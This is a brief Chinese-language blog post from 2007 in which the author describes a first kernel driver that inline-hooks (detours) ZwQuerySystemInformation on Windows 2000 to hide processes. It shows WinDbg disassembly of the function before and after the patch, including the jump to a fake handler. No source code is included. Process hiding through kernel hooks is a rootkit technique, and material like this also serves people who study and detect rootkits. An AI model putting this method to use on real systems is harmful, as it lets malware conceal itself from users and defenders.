Ring0 Detour Demo

Published on 2007 - 06 - 05

头一次写Driver,头一次用WinDbg+Vmware,头一次在ring0下做Detour.
不可思议的是,虽然调试出来错误很多,但是居然没有一次BSOD..
记录一下,Hook了ZwQuerySystemInformation做进程隐藏.
测试环境windows 2000 server sp4:

Hook前:

kd> u nt!ZwQuerySystemInformation
nt
!ZwQuerySystemInformation:
804011aa b897000000 mov eax
,97h
804011af 8d542404 lea edx
,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi
,edi


Hook后:


kd> u hookproc!Jmp_ZwQuerySystemInformation
hookproc
!Jmp_ZwQuerySystemInformation [e:\tmp\rk\hide_proc\hide_proc.c @ 141]:
f41504d0 b897000000 mov eax
,97h
f41504d5 eaaf1140800800 jmp 0008:804011AF
f41504dc 90 nop
f41504dd
90 nop
f41504de cc int
3
f41504df cc int
3
f41504e0 cc int
3
f41504e1 cc int
3
kd
> u nt!ZwQuerySystemInformation
nt
!ZwQuerySystemInformation:
804011aa e941f3d473 jmp hookproc
!Fake_ZwQuerySystemInformation (f41504f0)
804011af 8d542404 lea edx
,[esp+4]
804011b3 cd2e int 2Eh
804011b5 c21000 ret 10h
804011b8 8bff mov edi
,edi
nt
!ZwQuerySystemTime:
804011ba b898000000 mov eax
,98h
804011bf 8d542404 lea edx
,[esp+4]
804011c3 cd2e int 2Eh

Comments
Write a Comment